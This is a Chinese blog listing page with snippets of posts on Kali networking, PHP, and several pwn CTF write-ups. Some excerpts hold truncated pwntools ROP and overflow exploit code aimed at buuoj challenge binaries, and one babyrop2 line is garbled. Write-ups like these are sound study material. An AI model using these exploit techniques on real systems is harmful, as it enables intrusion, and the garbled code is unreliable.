- 博客(12)
- 收藏
- 关注
原创 VMware kali NAT网络模式配置静态IP遇到的问题
可以看到子网掩码是255.255.255.0 及动态ip最后只能在1~255之间,所以静态ip只能设置在这些之间 通过交换机只能访问到这些之间的ip(即没有设置DNS)使用命令ifconfig查看(现在正常是有网络的即ping www.baidu.com是成功的)ip与自己ifconfig 前面保持一致 . 最后(1-255),网关先空着 看第三步。添加以下内容此处需要使用vi编译器的知识不懂的请先了解。虚拟网络编辑器->vm8->NAT设置。记下这里的网关就可以去填写 然后保存。
2024-09-12 22:34:17
934
原创 php session()的作用和使用
session(会话):通过在服务器上存储用户信息以便随后使用(比如用户名称、购买商品等)。然而,会话信息是,在用户。如果您需要,可以把。
2024-09-06 19:28:03
231
原创 php链接数据库
res为数据库响应的结果集的一行数据通常为关联数组 mysqli_fetch_row(), mysqli_fetch_assoc()和mysqli_fetch_array()使用一样。$conn为数据库对象。
2024-09-06 18:04:38
482
原创 php get_mogic_quotes_gpc()
主要功能是得到magic_quotes_gpc的值(打印不出来但是**!magic_quotes_gpc()**的结果为1):PHP 指令 magic_quotes_gpc 为 on,对所有的 GET、POST 和 COOKIE 数据自动运行。
2024-09-06 17:38:27
294
原创 bjdctf_2020_babyrop 与bjdctf_2020_babyrop2(格式化字符leak)
bjdctf_2020_babyrop先checksec打开ida正常查看函数打开init函数发现puts函数然后进入vuln函数 存在栈溢出没有看到后门函数应该是libc leak+rop代码如下from pwn import*from LibcSearcher import*p=remote('node3.buuoj.cn',29901)#p=process('')elf=ELF('bjdctf_2020_babyrop')puts_got=elf.got['puts']p
2021-04-06 16:10:11
688
2
原创 picoctf_2018_rop chain
先进行检查 32位打开ida查看一下 vuln 函数存在溢出可以利用又看到函数表有flag函数 win1 win2 和a1 存在条件 需要控制这3个参数变量注意:0xBAAAAAAD是-1163220307对应的16进制的补码作为win_function2函数的参数下面的 0xDEADBAAD是-559039827对应的16进制的补码作为flag函数的参数(我都已经在ida中转化)之后又看到win1 win2最后写下脚本from pwn import*from LibcSearcher
2021-03-29 21:47:08
225
1
原创 babyrop2
from LibcSearcher import *#p = process('./babyrop2')p = remote('node3.buuoj.cn',27575)elf = ELF('babyrop2')pop_rdi = 0x400733pop_rsi_r15 = 0x400731 format_str = 0x400770 ret_addr = 0xbaby400734byaprintf_plt = elf.plt['printf']read_got = elf.go
2021-03-29 17:33:50
168
原创 bjdctf_2020_babystack2同stack1(整数溢出)
首先检查一下打开ida看一下(int)nbytes是signed int类型 后面read 的是unsigned int 类型 这里想到整数溢出 可以传输一个负数使其溢出下面是我的脚本from pwn import*from LibcSearcher import*p=remote('node3.buuoj.cn','26189')p.sendline('-121311')#此处可以随意写入一个负数payload='a'*0x18+p64(0x400726)p.sendline(paylo
2021-03-28 21:08:13
494
原创 pwn ciscn_2019_s_3
pwn ciscn_2019_s_3(srop)checksec一下发现是64位文件并只开了NX保护打开IDA 进入main函数直接转到vuln(可以看到明显栈溢出var_10距离rpb 0x10)发现有两个系统调用号,系统调用号的传参方式是先将调用号传入rax,然后参数依次从左至右传入rdi,rsi,rdx寄存器中,最后返回值存入rax看到最后有点奇怪开始时pop rbp mov rbp,rsp程序结束的时候直接是:retn(pop rip) 这里直接就跳出vuln函数了所以r
2021-03-23 21:37:54
257
原创 计算机系统学习笔记及pwn做题心得(1)
计算机系统学习笔记及pwn做题心得(1)计算机系统1编译系统分四个阶段完成,预处理器、编译器、汇编器、链接器一起构成了编译系统操作系统的基本功能:1 防止硬件被失控的应用程序滥用 2 向应用程序提供一些简单一致的机制来控制复杂而又通常大不相同的低级硬件设备计算机执行.c文件的过程 :.c >>.i >>.s >>.o >>执行系统硬件:总线(传输字) I/O设备 主存(临时...
2021-03-19 16:51:30
244
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人